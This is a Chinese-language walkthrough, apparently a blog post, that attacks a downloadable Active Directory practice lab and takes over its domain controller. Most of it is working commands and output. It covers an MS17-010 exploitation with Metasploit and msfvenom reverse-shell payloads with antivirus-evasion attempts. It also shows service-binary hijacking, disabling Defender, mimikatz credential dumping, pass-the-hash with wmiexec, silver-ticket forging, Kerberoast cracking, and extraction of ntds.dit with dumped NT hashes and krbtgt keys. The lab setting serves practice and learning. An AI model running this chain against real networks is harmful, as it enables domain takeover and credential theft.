admin 管理员组文章数量: 1087635
Offensive靶机渗透
这个没有web服务,直接进Client靶机,进行攻击
这里要求是根据用client靶机里的工具进行渗透攻击
我这里分两个方式进行测试,一个用自己的方法,一个用client靶机的方法
靶机地址:
链接: https://pan.baidu/s/1zH5Dbhcnor6rnCBZKsVjKw?pwd=rks3 提取码: rks3
靶机的密码,也在里面,不过要注意一下,域控的密码是:Password@
还需要配置一下网段,靶机是159网段的,我们创建一个VM2,类型是仅主机模式
配置好后,每个靶机都选上此网卡
用自己的方法测试
进去之后,先传一个fscan扫一下,看看域内结构
先看看IP地址
fscan一把嗦
fscan.exe -h 192.168.159.0/24
192.168.159.20:1433 open
192.168.159.200:445 open
192.168.159.20:445 open
192.168.159.10:445 open
192.168.159.200:139 open
192.168.159.20:139 open
192.168.159.10:139 open
192.168.159.200:135 open
192.168.159.20:135 open
192.168.159.10:135 open
192.168.159.200:88 open
192.168.159.10:7680 open
[*] NetInfo
[*]192.168.159.200
[->]dc
[->]192.168.159.200
[*] NetInfo
[*]192.168.159.20
[->]Offensive-SQL1
[->]192.168.159.20
[+] MS17-010 192.168.159.200 (Windows Server 2016 Datacenter Evaluation 14393)
[*] NetInfo
[*]192.168.159.10
[->]Client1
[->]192.168.159.10
[*] NetBios 192.168.159.200 [+] DC:dc.offensive.local Windows Server 2016 Datacenter Evaluation 14393
[*] NetBios 192.168.159.20 Offensive-SQL1.offensive.local Windows Server 2016 Datacenter Evaluation 14393
存活机器
192.168.159.200 ---->dc(域控)
192.168.159.20 ----->Offensive-SQL1
192.168.159.10 ---->Client1本机
20应该是sql服务
拿域控
在上面我们还发现,域控竟然可以打 MS17-010,那不是直接拿下域控了?
打开kali
msfconsole
search MS17-010
先用第一个试一下
输入options,看看设置
set RHOSTS 192.168.159.200
set LHOST 192.168.159.128
set payload windows/x64/meterpreter/reverse_tcp
exploit
不行,试一下10
use 10
也不行
都不行,后来发现在打开靶机的时候忘记配置环境,kali和靶机不在一个网段
打开虚拟网路编辑器配置一下就可以了(注意靶机都是159网段的,所以kali我们也设置为此网段)
设置好之后,打windows/smb/ms17_010_psexec,就能直接拿下域控
域控拿下了,域内整个主机都能拿下
拿下sql服务主机
严谨一点,看看我们能不能拿下sql服务那台主机,也就是192.168.159.20
在Client上先提权
提权
输入
systeminfo
看看有哪些补丁,可以进行提权
[01]: KB4506998
[02]: KB4462930
[03]: KB4465065
[04]: KB4470788
[05]: KB4480056
[06]: KB4489907
[07]: KB4503308
[08]: KB4489899
去
https://www.adminxe/win-exp/#
发现对于win10,这些补丁都不能提权
我们再来试试系统服务权限配置是否有错误(在windows启动的时候,会执行一些服务,在执行这些服务的时候,会在后台运行此类服务的可执行文件。假如某个低权限用户,对这些可执行文件有写的权限,那么就可以更改可执行文件中的内容,添加一些恶意内容,那么再下次启动windows就会以system权限运行这个可执行文件,就可以提权了)
用msf生成一个木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=4444 -f exe > /home/exm/Desktop/shell.exe
但是生成这个木马,在client中,有df,我们运行不了
不会免杀,只能用别人现成的项目
推荐:https://github/fdx-xdf/darkPulse
我们先生成一个二进制文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=4444 -f raw -o /home/exm/Desktop/shell.bin
darkPulse.exe -i shell.bin
会得到Program.exe这个已经做了免杀的木马
放到Client中
kali:
use exploit/multi/handler
set LHOST 192.168.159.10
set payload windows/x64/meterpreter/reverse_tcp
exploit
还是会被df拦截
运行一会,就给我们删除了
我们试试可信任服务路径漏洞提权
通过下面命令来查看是否存在
wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """
存在
我们还要看看我们是否有写的权限
icacls "C:/Program Files/"
C:/Program Files/ NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(M)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(M)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(RX)
BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
我们现在的用户是Alice,应该是一个普通用户,我们就看这个
BUILTIN\Users:(RX)
BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
(M)代表修改权限,(F)代表完全控制,(CI)代表从属容器将继承访问控制项,(OI)代表从属文件将继承访问控制项
只有读和写的权限,没有写的权限,所以不能利用此漏洞提权
AlwaysInstallElevated提权(组策略提权),我们看看这个是否开启
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
都不能执行,基本没用
到这里我就没办法了
其实还有个办法,在域控上创建一个Domain admins组的成员,直接登录sql服务就行了
参考别人的方法
进入client之后,发现是普通账户,先进行提权
提权
要用到一个工具:Powerup.ps1
poweUp 是 Privesc 模块下的脚本,拥有众多用来寻找目标主机 Windows 服务漏洞进行提权的实用脚本
要进入到powershell,可能有限制,输入
Powershell -ep bypass
绕过
导入PowerUp.ps1
Import-Module .\PowerUp.ps1
用查看有哪些漏洞可以提权
Invoke-AllChecks -verbose
ServiceName : VulnService
Path : C:\Program Files\Vuln Service\VulnService.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'VulnService' -Path <HijackPath>
HijackablePath : C:\Users\Alice\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\Alice\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'
-Command '...'
HijackablePath : C:\Python27\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Python27\\wlbsctrl.dll' -Command '...'
HijackablePath : C:\Python27\Tools\Scripts\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Python27\Tools\Scripts\\wlbsctrl.dll' -Command '...'
Key : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bginfo
Path : C:\BGinfo\Bginfo.exe /accepteula /ic:\bginfo\bgconfig.bgi /timer:0
ModifiableFile : C:\BGinfo\Bginfo.exe
发现这个文件VulnService.exe,可以被低用户修改,我们可以利用这个进行提权(后面的还显示可以进行dll提权)
Write-ServiceBinary -ServiceName VulnService -UserName "offensive\alice" -Password Passw0rd!
输入这个命令,就会自动帮我们生成一个exe的提权文件
再替换VulnService.exe的内容
cp .\service.exe "C:\Program Files\Vuln Service\VulnService.exe"
可以看看VulnService服务状态
sc qc VulnService
START_TYPE : 2 AUTO_START
是开启自启动的
我们重启一下
可以看到alice已经在Administrator组里了
重启之后,就是管理员权限的用户了,我们直接把df给关了
Set-MpPreference -disablerealtimeMonitoring $true
记住要以管理员身份启动
往后就是传一个猕猴桃抓密码(这里必须要2.1版本的才能抓到)
信息搜集
privilege::debug
sekurlsa::logonpasswords
然后就是用PowerView进行信息收集一波
Get-NetDomain 获取当前用户所在域的名称
当前域是offensive.local
还可以看看域控制器是谁
Get-NetDomainController 获取所有域控制器的信息
域控制器是dc.offensive.local
ip是192.168.159.200
再看看当前域用户有哪些
Get-NetUser | select name
也可以看看详细信息,就是不用| select name
这里我们主要看看name、memberof,发现用户dbadmin是Domain Admins组,只要我们拿下这个账户就可以畅游整个域了,因为Domain Admins是域管理员组
Get-NetGroup 获取所有域内组和组成员的信息
Get-NetGroup -UserName dbadmin
直接看dbadmin相关的组信息
这里发现也是Domain Admins组
然后接下来,就是可以直接利用pth攻击了,试试用Alice这个密码hash,去攻击dbadmin这个用户,看看能不能成功
是可以的
这里我先不用,继续按照原方法测试
再看一下域内有哪些计算机
Get-NetComputer | select name
DC
SQL1
CLIENT1
OFFENSIVE-SQL1
这里扫出来有4台主机,但是我们靶机总共就3台,我也搞不懂这里
根据计算机名字猜测有sql服务
接下来用PowerUpSQL.ps1这个工具
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain #发现域中的SQLServer实例
ComputerName : SQL1.offensive.local
Instance : SQL1.offensive.local,1433
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount : dbadmin
DomainAccountCn : dbadmin
Service : MSSQLSvc
Spn : MSSQLSvc/SQL1.offensive.local:1433
LastLogon : 5/20/2025 8:02 AM
Description :
ComputerName : SQL1.offensive.local
Instance : SQL1.offensive.local\SQLEXPRESS
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount : dbadmin
DomainAccountCn : dbadmin
Service : MSSQLSvc
Spn : MSSQLSvc/SQL1.offensive.local:SQLEXPRESS
LastLogon : 5/20/2025 8:02 AM
Description :
ComputerName : Offensive-SQL1.offensive.local
Instance : Offensive-SQL1.offensive.local,1433
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount : dbadmin
DomainAccountCn : dbadmin
Service : MSSQLSvc
Spn : MSSQLSvc/Offensive-SQL1.offensive.local:1433
LastLogon : 5/20/2025 8:02 AM
Description :
ComputerName : Offensive-SQL1.offensive.local
Instance : Offensive-SQL1.offensive.local\SQLEXPRESS
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount : dbadmin
DomainAccountCn : dbadmin
Service : MSSQLSvc
Spn : MSSQLSvc/Offensive-SQL1.offensive.local:SQLEXPRESS
LastLogon : 5/20/2025 8:02 AM
Description :
ComputerName : Offensive-SQL1
Instance : Offensive-SQL1,1433
DomainAccountSid : 150000052100019116520170230181228241449319714280400
DomainAccount : dbuser1
DomainAccountCn : dbuser1
Service : MSSQLSvc
Spn : MSSQLSvc/Offensive-SQL1:1433
LastLogon : 8/31/2019 11:29 PM
Description
这里可以看出,扫出的sql实例就两个
SQL1.offensive.local
Offensive-SQL1.offensive.local
就是这两个主机
可以看到,两个主机都关联了dbadmin账户(这个用户是在Domain Admins组里,很重要!),如果能通过sql服务拿下,就是高权限账户,可以直接登入域控
我们还可以看看其它信息,这里我列举几个,大家可以去晚上搜搜PowerUpSQL.ps1的利用
Get-SQLServerConfiguration -Instance SQLServerTest #查看实例SQLServerTest的配置信息
Get-SQLServerInfo -Instance SQLServerTest #查看实例SQLServerTest的服务信息
Get-SQLServerLogin -Instance SQLServerTest #查看实例SQLServerTest的登录信息
Get-SQLConnectionTest -Instance SQLServerTest #查看实例SQLServerTest是否可访问
Invoke-SQLAudit -Instance SQLServerTest -verbose #查看实例 SQLServerTest 是否配置错误
这里SQLServerTest就是发现的sql实例(SQL1、Offensive-SQL1)
这里有个问题我们要选择哪个,我们选择Offensive-SQL1
为什么呢?我也不知道,我是直接去靶机里面看的,哈哈哈哈哈
Invoke-SQLAudit -Instance Offensive-SQL -verbose
命令都可以试试看,但是都没什么东西
再回到powerview
Find-LocalAdminAccess 在域上查找当前用户具有本地管理员访问权限的计算机
只有我们当前的主机,还是我们自己提权设置的
没办法了
然后发现使用HeidiSQL再用windows auth就可以直接连接mssql(sql服务),直接登录,但是我这里死活登不上
没办法了,只能用PTH(哈希传递攻击)
拿下sql服务主机
我们用Alice的hash,去试试dbadmin是否能登入成功
alice的hash,我们用mimikatz拿到
打开kali,用impackt的wmiexec,这个是交互式的shell,不要用smbexec
python3 wmiexec.py -hashes :3766c17d09689c438a072a33270cb6f5 offensive.local/dbadmin@192.168.159.20
我们来试试能不能直接登入域控
python3 wmiexec.py -hashes :3766c17d09689c438a072a33270cb6f5 offensive.local/dbadmin@192.168.159.200
域控也拿下了,可以收工了
现在我们再试试其它的
拿下域控
用mimikatz的Pass the Hash (哈希传递)攻击,打开一个powershell
.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:dbadmin /domain:offensive.local /ntlm:3766c17d09689c438a072a33270cb6f5 /run:powershell.exe" exit
打开这个powershell就是以dbadmin的身份启动的,执行的网络请求,都是dbadmin身份请求的(它是Domain Admins组,可以遨游域内)
再输入这个
Enter-PSSession -ComputerName dc.offensive.local
就可以进入域控主机了
先把df给关了
Set-MpPreference -disablerealtimeMonitoring $true
权限维持(构造银票,金票)
想要构造银票,就要知道域内有哪些服务,哪些用户启用SPN
SPN(Service Principal Name,服务主体名称)是 Kerberos 身份认证协议中用于 唯一标识服务实例的标识符。在 Active Directory(AD) 环境中,SPN 将服务(如数据库、Web 服务等)与运行该服务的用户账户(通常是服务账户)绑定,使客户端能够通过 Kerberos 协议安全地验证和访问服务。
就是想要构造银票,就必须知道SPN,SPN也就是服务
用GetUserSPNs.ps1来查看,哪些用户绑定了SPN
.\GetUserSPNs.ps1
.\GetUserSPNs.ps1
ServicePrincipalName : kadmin/changepw
Name : krbtgt
SAMAccountName : krbtgt
MemberOf : CN=Denied RODC Password Replication Group,CN=Users,DC=offensive,DC=local
PasswordLastSet : 8/18/2019 4:35:31 AM
ServicePrincipalName : MSSQLSvc/SQL1.offensive.local:1433
Name : dbadmin
SAMAccountName : dbadmin
MemberOf : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet : 5/20/2025 8:02:17 AM
ServicePrincipalName : MSSQLSvc/SQL1.offensive.local:SQLEXPRESS
Name : dbadmin
SAMAccountName : dbadmin
MemberOf : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet : 5/20/2025 8:02:17 AM
ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:1433
Name : dbadmin
SAMAccountName : dbadmin
MemberOf : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet : 5/20/2025 8:02:17 AM
ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:SQLEXPRESS
Name : dbadmin
SAMAccountName : dbadmin
MemberOf : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet : 5/20/2025 8:02:17 AM
ServicePrincipalName : MSSQLSvc/Offensive-SQL1:1433
Name : dbuser1
SAMAccountName : dbuser1
MemberOf :
我们应该找的是与dbadmin账户绑定的SPN
ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:1433
Name : dbadmin
SAMAccountName : dbadmin
MemberOf : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet : 5/20/2025 8:02:17 AM
我们知道构造银票就是伪造ST,构造银票的要求:
- 目标主机hsah
- 目标域名
- 目标域的sid
- 要模拟的用户账户名称
- 要模拟的用户RID
- 该账户所属组的RID
现在我们就可以构造dbadmin的银票了,因为我们已经知道dbadmin的hash,dbadmin是与MSSQLSvc服务绑定的
hsah:3766c17d09689c438a072a33270cb6f5
sid:S-1-5-21-1187620287-4058297830-2395299116
目标域名:offensive.local
要模拟的用户账户名称:可以随便伪造
要模拟的用户RID:1103(就是跟在sid后面的数字,其实这个也是可以伪造的,只要1103在域内有权限就可以,甚至可以伪造为500,但是容易被检测)
服务名:MSSQLSvc
kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /target:Offensive-SQL1:1433 /service:MSSQLSvc /rc4:3766c17d09689c438a072a33270cb6f5 /user:idontexist /id:1103(保存到文件中)
kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /target:Offensive-SQL1:1433 /service:MSSQLSvc /rc4:3766c17d09689c438a072a33270cb6f5 /user:idontexist /id:1103 /ptt(保存到内存中)
/target:目标计算机名
/service:服务名,就是我们上边扫出的SPN( MSSQLSvc/Offensive-SQL1.offensive.local:1433),只要MSSQLSvc就可以了
/id:RID
我们构造成功了,有了这个票据,之后就可以访问mssql服务了
我们在不知道服务hash的时候,我们其实可以爆破hash的
首先我们要对服务请求一次票据,把票据保存在本地,再通过本地保存的票据去爆破
用Add-Type命令,请求票据
Add-Type –AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken –ArgumentList 'MSSQLSvc/Offensive-SQL1:1433'
再利用mimikatz把票据保存到本地中
kerberos::list /export
然后就是爆破
python tgsrepcrack.py pass.txt "*.kirbi"
构造金票
构造金票是伪造TGT,伪造TGT的关键就是要知道krbtgt的hash
我们现在是不知道krbtgt的hash,krbtgt是在域控上的,我们上面拿下了域控,权限还是管理员
我们可以去拿到域控上的ntds.dit文件,这个文件是存放域内所有用户的hash的,但是这个文件是加密的,需要SYS文件来解密,也就是说,我们需要拿到ntds.dit、SYS这两个文件
拿ntds.dit文件,需要用到这个工具\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -Verbose -LocalDestination 'C:\Users\dbadmin\Desktop\ntds.dit'
报错了,感觉可能会出问题,现在ntds就在我们桌面上了
接下来是拿下SYS
reg save HKLM\SYSTEM C:\Users\dbadmin\Desktop\SYS (保存到桌面去)
接下来就是传输到我们client主机上(域控可以传输文件到任意域内主机)
Copy-Item '\\dc.offensive.local\C$\Users\dbadmin\Desktop\ntds.dit' -Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\ntds.dit'
Copy-Item '\\dc.offensive.local\C$\Users\dbadmin\Desktop\SYS' -Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\SYS'
接下就是解密ntds文件了,要用到Get-BootKey
Get-BootKey -SystemHivePath 'SYS'
$key = Get-BootKey -SystemHivePath 'SYS'
Get-ADDBAccount -All -DBPath 'C:\Users\Alice\Desktop\tools\ntds.dit' -BootKey $key
报错了,应该就是我们在域控那ntds那出的问题
我们可以用Windows esentutl二进制文件修复ntds.dit,再传一遍
esentutl.exe /p 'C:\Users\dbadmin\Desktop\ntds.dit' /!10240 /8 /o
Copy-Item '\\dc.offensive.local\C$\Users\dbadmin\Desktop\ntds.dit' -Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\ntds.dit'
继续解密
Get-ADDBAccount -All -DBPath 'C:\Users\Alice\Desktop\tools\ntds.dit' -BootKey $key
DistinguishedName: CN=Administrator,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-500
Guid: d482c126-05da-4954-9a87-5005b468c6db
SamAccountName: Administrator
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount, PasswordNeverExpires
AdminCount: True
Deleted: False
LastLogon: 5/20/2025 8:43:14 AM
DisplayName:
GivenName:
Surname:
Description: Built-in account for administering the computer/domain
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: c456c606a647ef44b646c44a227917a4
LMHash:
NTHashHistory:
LMHashHistory:
SupplementalCredentials:
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=Guest,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-501
Guid: bcf58990-a81e-47e9-9358-68d497d97c16
SamAccountName: Guest
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 514
SidHistory:
Enabled: False
UserAccountControl: Disabled, PasswordNotRequired, NormalAccount, PasswordNeverExpires
AdminCount: False
Deleted: False
LastLogon:
DisplayName:
GivenName:
Surname:
Description: Built-in account for guest access to the computer/domain
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-32-544
Secrets
NTHash:
LMHash:
NTHashHistory:
LMHashHistory:
SupplementalCredentials:
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=DefaultAccount,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-503
Guid: 844363d4-cc5a-4b8a-8097-0bfd71a3f7e1
SamAccountName: DefaultAccount
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: False
UserAccountControl: Disabled, PasswordNotRequired, NormalAccount, PasswordNeverExpires
AdminCount: False
Deleted: False
LastLogon:
DisplayName:
GivenName:
Surname:
Description: A user account managed by the system.
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-32-544
Secrets
NTHash:
LMHash:
NTHashHistory:
LMHashHistory:
SupplementalCredentials:
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=krbtgt,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-502
Guid: 9069b2a1-dc1f-4304-bd7d-75c2981ce733
SamAccountName: krbtgt
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: False
UserAccountControl: Disabled, NormalAccount
AdminCount: True
Deleted: False
LastLogon:
DisplayName:
GivenName:
Surname:
Description: Key Distribution Center Service Account
ServicePrincipalName: {kadmin/changepw}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: 61d83c569b93bfcd4ca2087011361caa
LMHash:
NTHashHistory:
Hash 01: 61d83c569b93bfcd4ca2087011361caa
LMHashHistory:
Hash 01: 8a0c759ba84902c107491a110cc5eb11
SupplementalCredentials:
ClearText:
NTLMStrongHash: 03e46263c90a310e6120dbb0443d2775
Kerberos:
Credentials:
DES_CBC_MD5
Key: 26cdb9166b8a5897
OldCredentials:
Salt: OFFENSIVE.LOCALkrbtgt
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: dbae18467bd2eeb7eb2679e759b2b14d0755c1a4c3757b2f475399bb4ddb73b2
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: acf72b52482ca2fd5e3b4b7b4082bb98
Iterations: 4096
DES_CBC_MD5
Key: 26cdb9166b8a5897
Iterations: 4096
OldCredentials:
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALkrbtgt
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 02: 700cb6846ef697a0511751b028f17710
Hash 03: ae90de64d9f4bdb2d6603790ac99be49
Hash 04: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 05: 700cb6846ef697a0511751b028f17710
Hash 06: 4cddad54c8c4ba642b304d3f94ce3c3c
Hash 07: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 08: 6f5a5174852e2968cc601c2cb1f52f43
Hash 09: 6f5a5174852e2968cc601c2cb1f52f43
Hash 10: 71eca34e61d5b426bfe06dcc474c00fb
Hash 11: 5d525f82d65498a69a696ab9c4467712
Hash 12: 6f5a5174852e2968cc601c2cb1f52f43
Hash 13: 72ad28b48a0aa05ad995fabaaa734a72
Hash 14: 5d525f82d65498a69a696ab9c4467712
Hash 15: b755afb81b2c709fe6cd82a1a9dbca71
Hash 16: b755afb81b2c709fe6cd82a1a9dbca71
Hash 17: a162dedd4b0f6b269064d5064eb09746
Hash 18: f519c3aff0eb14aa098cff4432b45448
Hash 19: 2b3dfeb590b5dc08ea71e13a4335cc03
Hash 20: 9d1512fad413e6532cc8c174f1f8df83
Hash 21: 842035136db4cd50bd988cfaecce0a13
Hash 22: 842035136db4cd50bd988cfaecce0a13
Hash 23: 2e907c596a7c784f0e71bab7f2384443
Hash 24: c794ef59cc7b0919451ae2a934a924f4
Hash 25: c794ef59cc7b0919451ae2a934a924f4
Hash 26: cb2b83b833a131daa0830b1fe1572438
Hash 27: a994bcdf6f69cfd3768df73477af0fdf
Hash 28: d731fff19c891a814f74f533b76c0366
Hash 29: 722a0317349cdc5c3d00a487c7c179f0
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=Alice,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1103
Guid: 69309828-b8db-4767-92a5-04218b7b5892
SamAccountName: Alice
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount
AdminCount: False
Deleted: False
LastLogon: 5/21/2025 11:32:42 PM
DisplayName:
GivenName:
Surname:
Description:
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: 3766c17d09689c438a072a33270cb6f5
LMHash:
NTHashHistory:
Hash 01: 3766c17d09689c438a072a33270cb6f5
Hash 02: fc525c9683e8fe067095ba2ddc971889
LMHashHistory:
Hash 01: 2469eabb56d6b023c5be1e9ed2088d41
Hash 02: 25b76b9f3a0c54e0cd03a09d9a00719f
SupplementalCredentials:
ClearText:
NTLMStrongHash: aaf6778bb0ab00c3bd6294012e560957
Kerberos:
Credentials:
DES_CBC_MD5
Key: c13beccd2a431646
OldCredentials:
DES_CBC_MD5
Key: 08466d2aea521a9e
Salt: OFFENSIVE.LOCALAlice
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 71e62ec545184cfd49f01a1d7102eb203693ee72d87a7323f816a71d6bdfc9c3
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 3be1c74aaa01de7b5bae20a763b012b0
Iterations: 4096
DES_CBC_MD5
Key: c13beccd2a431646
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 0367d437b5e180a4102980bc62caffb8dab019afbff5fd866d2f47318d6c5444
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 1aea2874899494904d6e29c07341dc92
Iterations: 4096
DES_CBC_MD5
Key: 08466d2aea521a9e
Iterations: 4096
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALAlice
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 610143492713009ae6fe0390c44906b2
Hash 02: 8fac6164f6f3f423f987247842d45f56
Hash 03: ca55af61407edf30ab499bab53be5ec2
Hash 04: 610143492713009ae6fe0390c44906b2
Hash 05: 737fdfe2f0d5d7553f738eab54cf81f2
Hash 06: a5c0dc5255ecc156fe1de7871531aa54
Hash 07: 092cd7f32397af67d2193841df932a7d
Hash 08: 6b1fd8a88f55b80b45de9d6be008bda7
Hash 09: f578c20ac76889afdfed472b9272ca25
Hash 10: 814c0072489fa8df242ba934800650c3
Hash 11: 0b551ab6f429f7b77cfcc50aab42e14a
Hash 12: 6b1fd8a88f55b80b45de9d6be008bda7
Hash 13: bc6c33c390af2d01fb7678c9ab383b12
Hash 14: 454a54e41be5d396d72b065d31a7db89
Hash 15: da998a0832f6eca9c80203d5de1662c0
Hash 16: 3e61a3846157538ae4886dc54baeb385
Hash 17: f69aeb89e98ae73afd13cef8c393a0e6
Hash 18: cb7d45f427ce9a298a8d1566eab37c10
Hash 19: 2c83e45d564ed9d47173b3349db53840
Hash 20: 4700174ae09866d65d39794f29962519
Hash 21: 05cd89098962ed99cb108980b339e176
Hash 22: 985d048f68fecd77b131be9603fb8d1b
Hash 23: 78389334135430afcb52e385efe55a19
Hash 24: 3debce8c827a10f31d312acb68c8b198
Hash 25: 06b26a463c8bbe7707e2cef738c1866a
Hash 26: 3dfa6d83f34dd93d75985473f5146f92
Hash 27: fc64955879ba7a769b6d401515145dc0
Hash 28: 6f413dd8b16e9fc5624230783b918d59
Hash 29: 8fe3316b9fe13cd4026c208c251f218a
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=dbuser1,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1104
Guid: f7ddc0ef-e033-4b0e-8adb-ac9f0699f473
SamAccountName: dbuser1
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount
AdminCount: False
Deleted: False
LastLogon: 8/31/2019 11:29:31 PM
DisplayName:
GivenName:
Surname:
Description:
ServicePrincipalName: {MSSQLSvc/Offensive-SQL1:1433}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: fc525c9683e8fe067095ba2ddc971889
LMHash:
NTHashHistory:
Hash 01: fc525c9683e8fe067095ba2ddc971889
LMHashHistory:
Hash 01: a78bec1e79d51eafceecf78f34242203
SupplementalCredentials:
ClearText:
NTLMStrongHash: 029fdd4117a068b677e6ffc94f3d9a99
Kerberos:
Credentials:
DES_CBC_MD5
Key: 26255402b6d6371a
OldCredentials:
Salt: OFFENSIVE.LOCALdbuser1
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 7e6fe004122ab35b4d8eee3394ff362260f7c803bab2ac94c5221be62083ee32
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 6021b0fdd0847ae6b187d339cf19c6da
Iterations: 4096
DES_CBC_MD5
Key: 26255402b6d6371a
Iterations: 4096
OldCredentials:
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALdbuser1
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 1df23e1c46610647cdedc0a0f98f62e7
